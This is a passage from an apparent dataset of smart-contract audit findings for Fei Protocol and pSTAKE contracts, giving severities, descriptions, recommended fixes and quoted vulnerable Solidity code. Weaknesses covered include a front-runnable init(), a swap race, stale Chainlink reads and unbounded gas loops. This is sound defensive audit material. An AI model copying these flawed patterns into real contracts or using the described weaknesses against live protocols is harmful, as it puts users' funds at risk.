receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n\\nAdditionally, when the `swap` is called, and there is not enough FEI to re-initiate the Balancer auction, all the Tribe gets withdrawn. So the next time the `swap` is called, there is no Tribe in the contract again.\\n```\\n// 5. Send remaining tokenReceived to target\\nIERC20(tokenReceived).transfer(tokenReceivingAddress, IERC20(tokenReceived).balanceOf(address(this)));\\n```\\nчCreate an automated mechanism that mints/transfers Tribe when it is needed in the swapper contract.чч```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n -StableSwapOperatorV1 - resistantFei value is not correct in the resistantBalanceAndFei functionчhighчThe `resistantBalanceAndFei` function of a `PCVDeposit` contract is supposed to return the amount of funds that the contract controls; it is then used to evaluate the total value of PCV (collateral in the protocol). Additionally, this function returns the number of FEI tokens that are protocol-controlled. These FEI tokens are “temporarily minted”; they are not backed up by the collateral and shouldn't be used in calculations that determine the collateralization of the protocol.\\nIdeally, the amount of these FEI tokens should be the same during the deposit, withdrawal, and the `resistantBalanceAndFei` function call. In the `StableSwapOperatorV1` contract, all these values are totally different:\\nduring the deposit, the amount of required FEI tokens is calculated. It's done in a way so the values of FEI and 3pool tokens in the metapool should be equal after the deposit. So if there is the initial imbalance of FEI and 3pool tokens, the deposit value of these tokens will be different:\\n```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n\\nduring the withdrawal, the FEI and 3pool tokens are withdrawn in the same proportion as they are present in the metapool:\\n```\\nuint256[2] memory \\_minAmounts; // [0, 0]\\nIERC20(pool).approve(pool, \\_lpToWithdraw);\\nuint256 \\_3crvBalanceBefore = IERC20(\\_3crv).balanceOf(address(this));\\nIStableSwap2(pool).remove\\_liquidity(\\_lpToWithdraw, \\_minAmounts);\\n```\\n\\nin the `resistantBalanceAndFei` function, the value of protocol-controlled FEI tokens and the value of 3pool tokens deposited are considered equal:\\n```\\nresistantBalance = \\_lpPriceUSD / 2;\\nresistantFei = resistantBalance;\\n```\\n\\nSome of these values may be equal under some circumstances, but that is not enforced. After one of the steps (deposit or withdrawal), the total PCV value and collateralization may be changed significantly.чMake sure that deposit, withdrawal, and the `resistantBalanceAndFei` are consistent and won't instantly change the PCV value significantly.чч```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n -CollateralizationOracle - Fei in excluded deposits contributes to userCirculatingFeiчhighч`CollateralizationOracle.pcvStats` iterates over all deposits, queries the resistant balance and FEI for each deposit, and accumulates the total value of the resistant balances and the total resistant FEI. Any Guardian or Governor can exclude (and re-include) a deposit that has become problematic in some way, for example, because it is reporting wrong numbers. Finally, the `pcvStats` function computes the `userCirculatingFei` as the total FEI supply minus the accumulated resistant FEI balances; the idea here is to determine the amount of “free” FEI, or FEI that is not PCV. However, the FEI balances from excluded deposits contribute to the `userCirculatingFei`, although they are clearly not “free” FEI. That leads to a wrong `protocolEquity` and a skewed collateralization ratio and might therefore have a significant impact on the economics of the system.\\nIt should be noted that even the exclusion from the total PCV leads to a `protocolEquity` and a collateralization ratio that could be considered skewed (again, it might depend on the exact reasons for exclusion), but “adding” the missing FEI to the `userCirculatingFei` distorts these numbers even more.\\nIn the extreme scenario that all deposits have been excluded, the entire Fei supply is currently reported as `userCirculatingFei`.\\n```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 \\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\nчIt is unclear how to fix this. One might want to exclude the FEI in excluded deposits entirely from the calculation, but not knowing the amount was the reason to exclude the deposit in the first place.\\nOne option could be to let the entity that excludes a deposit specify substitute values that should be used instead of querying the numbers from the deposit. However, it is questionable whether this approach is practical if the numbers we'd like to see as substitute values change quickly or repeatedly over time. Ultimately, the querying function itself should be fixed. Moreover, as the substitute values can dramatically impact the system economics, we'd only like to trust the Governor with this and not give this permission to a Guardian. However, the original intention was to give a role with less trust than the Governor the possibility to react quickly to a deposit that reports wrong numbers; if the exclusion of deposits becomes the Governor's privilege, such a quick and lightweight intervention isn't possible anymore.\\nIndependently, we recommend taking proper care of the situation that all deposits - or just too many - have been excluded, for example, by setting the returned `validityStatus` to `false`, as in this case, there is not enough information to compute the collateralization ratio even as a crude approximation.чч```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 \\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\n -BalancerLBPSwapper - init() can be front-run to potentially steal tokensчmediumчThe deployment process for `BalancerLBPSwapper` appears to be the following:\\ndeploy `BalancerLBPSwapper`.\\nrun `ILiquidityBootstrappingPoolFactory.create()` proving the newly deployed swapper address as the owner of the pool.\\ninitialize `BalancerLBPSwapper.init()` with the address of the newly created pool.\\nThis process may be split across multiple transactions as in the `v2Phase1.js` deployment scenario.\\nBetween step (1) and (3) there is a window of opportunity for someone to maliciously initialize contract. This should be easily detectable because calling `init()` twice should revert the second transaction. If this is not caught in the deployment script this may have more severe security implications. Otherwise, this window can be used to grief the deployment initializing it before the original initializer does forcing them to redeploy the contract or to steal any tokenSpent/tokenReceived that are owned by the contract at this time.\\nNote: It is assumed that the contract will not own a lot of tokens right after deployment rendering the scenario of stealing tokens more unlikely. However, that highly depends on the deployment script for the contract system.\\n```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), \"BalancerLBPSwapper: initialized\");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), \"BalancerLBPSwapper: contract not pool owner\");\\n```\\n\\n```\\nIERC20(tokenSpent).approve(address(\\_vault), type(uint256).max);\\nIERC20(tokenReceived).approve(address(\\_vault), type(uint256).max);\\n```\\nчprotect `BalancerLBPSwapper.init()` and only allow a trusted entity (e.g. the initial deployer) to call this method.чч```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), \"BalancerLBPSwapper: initialized\");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), \"BalancerLBPSwapper: contract not pool owner\");\\n```\\n -PCVEquityMinter and BalancerLBPSwapper - desynchronisation raceчmediumчThere is nothing that prevents other actors from calling `BalancerLBPSwapper.swap()` `afterTime` but right before `PCVEquityMinter.mint()` would as long as the `minAmount` required for the call to pass is deposited to `BalancerLBPSwapper`.\\nBoth the `PCVEquityMinter.mint()` and `BalancerLBPSwapper.swap()` are timed (via the `afterTime` modifier) and are ideally in sync. In an ideal world the incentive to call `mint()` would be enough to ensure that both contracts are always in sync, however, a malicious actor might interfere by calling `.swap()` directly, providing the `minAmount` required for the call to pass. This will have two effects:\\ninstead of taking the newly minted FEI from `PCVEquityMinter`, existing FEI from the malicious user will be used with the pool. (instead of inflating the token the malicious actor basically pays for it)\\nthe `Timed` modifiers of both contracts will be out of sync with `BalancerLBPSwapper.swap()` being reset (and failing until it becomes available again) and `PCVEquityMinter.mint()` still being available. Furthermore, keeper-scripts (or actors that want to get the incentive) might continue to attempt to `mint()` while the call will ultimately fail in `.swap()` due to the resynchronization of `timed` (unless they simulate the calls first).\\nNote: There are not a lot of incentives to actually exploit this other than preventing protocol inflation (mint) and potentially griefing users. A malicious user will lose out on the incentivized call and has to ensure that the `minAmount` required for `.swap()` to work is available. It is, however, in the best interest of security to defuse the unpredictable racy character of the contract interaction.\\n```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n\\n```\\nfunction swap() external override afterTime whenNotPaused {\\n (\\n uint256 spentReserves,\\n uint256 receivedReserves, \\n uint256 lastChangeBlock\\n ) = getReserves();\\n\\n // Ensures no actor can change the pool contents earlier in the block\\n require(lastChangeBlock < block.number, \"BalancerLBPSwapper: pool changed this block\");\\n```\\nчIf `BalancerLBPSwapper.swap()` is only to be called within the flows of action from a `PCVEquityMinter.mint()` it is suggested to authenticate the call and only let `PCVEquityMinter` call `.swap()`чч```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n -CollateralizationOracleWrapper - the deviation threshold check in update() always returns falseчmediumчA call to `update()` returns a boolean flag indicating whether the update was performed on outdated data. This flag is being checked in `updateIfOutdated()` which is typically called by an incentivized keeper function.\\nThe `_isExceededDeviationThreshold` calls at the end of the `_update()` function always return `false` as they are comparing the same values (cachedProtocolControlledValue to the `_protocolControlledValue` value and `cachedProtocolControlledValue` has just been set to `_protocolControlledValue` a couple of lines before). `_isExceededDeviationThreshold` will, therefore, never detect a deviation and return `false´.\\nThere may currently be no incentive (e.g. from the keeper side) to call `update()` if the values are not outdated but they deviated too much from the target. However, anyone can force an update by calling the non-incentivized public `update()` method instead.\\n```\\n require(\\_validityStatus, \"CollateralizationOracleWrapper: CollateralizationOracle is invalid\");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\nчAdd unit tests to check for all three return conditions (timed, deviationA, deviationB)\\nMake sure to compare the current to the stored value before updating the cached values when calling `_isExceededDeviationThreshold`.чч```\\n require(\\_validityStatus, \"CollateralizationOracleWrapper: CollateralizationOracle is invalid\");\\n\\n // set cache variables\\n cachedProtocolControlledValue = \\_protocolControlledValue;\\n cachedUserCirculatingFei = \\_userCirculatingFei;\\n cachedProtocolEquity = \\_protocolEquity;\\n\\n // reset time\\n \\_initTimed();\\n\\n // emit event\\n emit CachedValueUpdate(\\n msg.sender,\\n cachedProtocolControlledValue,\\n cachedUserCirculatingFei,\\n cachedProtocolEquity\\n );\\n\\n return outdated\\n || \\_isExceededDeviationThreshold(cachedProtocolControlledValue, \\_protocolControlledValue)\\n || \\_isExceededDeviationThreshold(cachedUserCirculatingFei, \\_userCirculatingFei);\\n}\\n```\\n -ChainlinkOracleWrapper - latestRoundData might return stale resultsчmediumчThe oracle wrapper calls out to a chainlink oracle receiving the `latestRoundData()`. It then checks freshness by verifying that the answer is indeed for the last known round. The returned `updatedAt` timestamp is not checked.\\nIf there is a problem with chainlink starting a new round and finding consensus on the new value for the oracle (e.g. chainlink nodes abandon the oracle, chain congestion, vulnerability/attacks on the chainlink system) consumers of this contract may continue using outdated stale data (if oracles are unable to submit no new round is started)\\n```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n\\n```\\n/// @notice determine if read value is stale\\n/// @return true if read value is stale\\nfunction isOutdated() external view override returns (bool) {\\n (uint80 roundId,,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n return answeredInRound != roundId;\\n}\\n```\\nчConsider checking the oracle responses `updatedAt` value after calling out to `chainlinkOracle.latestRoundData()` verifying that the result is within an allowed margin of freshness.чч```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n -CollateralizationOracle - missing events and incomplete event informationчlowчThe `CollateralizationOracle.setDepositExclusion` function is used to exclude and re-include deposits from collateralization calculations. Unlike the other state-changing functions in this contract, it doesn't emit an event to inform about the exclusion or re-inclusion.\\n```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n\\nThe `DepositAdd` event emits not only the deposit address but also the deposit's token. Despite the symmetry, the `DepositRemove` event does not emit the token.\\n```\\nevent DepositAdd(address from, address indexed deposit, address indexed token);\\nevent DepositRemove(address from, address indexed deposit);\\n```\\nч`setDepositInclusion` should emit an event that informs about the deposit and whether it was included or excluded.\\nFor symmetry reasons and because it is indeed useful information, the `DepositRemove` event could include the deposit's token.чч```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n -RateLimited - Contract starts with a full buffer at deploymentчlowчA contract that inherits from `RateLimited` starts out with a full buffer when it is deployed.\\n```\\n\\_bufferStored = \\_bufferCap;\\n```\\n\\nThat means the full `bufferCap` is immediately available after deployment; it doesn't have to be built up over time. This behavior might be unexpected.чWe recommend starting with an empty buffer, or - if there are valid reasons for the current implementation - at least document it clearly.чч```\\n\\_bufferStored = \\_bufferCap;\\n```\\n -BalancerLBPSwapper - tokenSpent and tokenReceived should be immutableчlowчAcc. to the inline comment both `tokenSpent` and `tokenReceived` should be immutable but they are not declared as such.\\n```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n\\n```\\n/// @notice the token to be auctioned\\naddress public override tokenSpent;\\n\\n/// @notice the token to buy\\naddress public override tokenReceived;\\n```\\nчDeclare both variable `immutable`.чч```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n -CollateralizationOracle - potentially unsafe castsчlowч`protocolControlledValue` is the cumulative USD token value of all tokens in the PCV. The USD value is determined using external chainlink oracles. To mitigate some effects of attacks on chainlink to propagate to this protocol it is recommended to implement a defensive approach to handling values derived from the external source. Arithm. overflows are checked by the compiler (0.8.4), however, it does not guarantee safe casting from unsigned to signed integer. The scenario of this happening might be rather unlikely, however, there is no guarantee that the external price-feed is not taken over by malicious actors and this is when every line of defense counts.\\n```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\n\\n```\\nprotocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n```\\nчPerform overflow checked SafeCast as another line of defense against oracle manipulation.чч```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n -FeiTimedMinter - constructor does not enforce the same boundaries as setter for frequencyчlowчThe setter method for `frequency` enforced upper and lower bounds while the constructor does not. Users cannot trust that the `frequency` is actually set to be within bounds on deployment.\\n```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n\\n```\\nfunction setFrequency(uint256 newFrequency) external override onlyGovernorOrAdmin {\\n require(newFrequency >= MIN\\_MINT\\_FREQUENCY, \"FeiTimedMinter: frequency low\");\\n require(newFrequency <= MAX\\_MINT\\_FREQUENCY, \"FeiTimedMinter: frequency high\");\\n\\n \\_setDuration(newFrequency);\\n}\\n```\\nчPerform the same checks on `frequency` in the constructor as in the `setFrequency` method.\\nThis contract is also inherited by a range of contracts that might specify different boundaries to what is hardcoded in the `FeiTimedMinter`. A way to enforce bounds-checks could be to allow overriding the setter method and using the setter in the constructor as well ensuring that bounds are also checked on deployment.чч```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n -CollateralizationOracle - swapDeposit should call internal functions to remove/add depositsчlowчInstead of calling `removeDeposit` and `addDeposit`, `swapDeposit` should call its internal sister functions `_removeDeposit` and `_addDeposit` to avoid running the `onlyGovernor` checks multiple times.\\n```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\nчCall the internal functions instead. addDeposit's and removeDeposit's visibility can then be changed from `public` to `external`.чч```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\n -CollateralizationOracle - misleading commentsчlowчAccording to an inline comment in `isOvercollateralized`, the validity status of `pcvStats` is ignored, while it is actually being checked.\\nSimilarly, a comment in `pcvStats` mentions that the returned `protocolEquity` is 0 if there is less PCV than circulating FEI, while in reality, `pcvStats` always returns the difference between the former and the latter, even if it is negative.\\n```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool \\_valid) = pcvStats();\\n require(\\_valid, \"CollateralizationOracle: reading is invalid\");\\n return \\_protocolEquity > 0;\\n}\\n```\\n\\n```\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\nчRevise the comments.чч```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool \\_valid) = pcvStats();\\n require(\\_valid, \"CollateralizationOracle: reading is invalid\");\\n return \\_protocolEquity > 0;\\n}\\n```\\n -The withdrawUnstakedTokens may run out of gasчhighчThe `withdrawUnstakedTokens` is iterating over all batches of unstaked tokens. One user, if unstaked many times, could get their tokens stuck in the contract.\\n```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), \"LQ20\");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, \"LQ21\");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\nчResolution\\nComment from pSTAKE Finance team:\\nHave implemented a batchingLimit variable which enforces a definite number of iterations during withdrawal of unstaked tokens, instead of indefinite iterations.\\nLimit the number of processed unstaked batches, and possibly add pagination.чч```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), \"LQ20\");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, \"LQ21\");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\n -The _calculatePendingRewards can run out of gasчmediumчThe reward rate in STokens can be changed, and the history of these changes are stored in the contract:\\n```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), \"ST17\");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"ST2\");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n\\nWhen the reward is calculated `for` each user, all changes of the `_rewardRate` are considered. So there is a `for` loop that iterates over all changes since the last reward update. If the reward rate was changed many times, the `_calculatePendingRewards` function could run out of gas.чProvide an option to partially update the reward, so the full update can be split in multiple transactions.чч```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), \"ST17\");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"ST2\");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n -The calculateRewards should not be callable by the whitelisted contractчmediumчThe `calculateRewards` function should only be called for non-whitelisted addresses:\\n```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), \"ST5\");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, 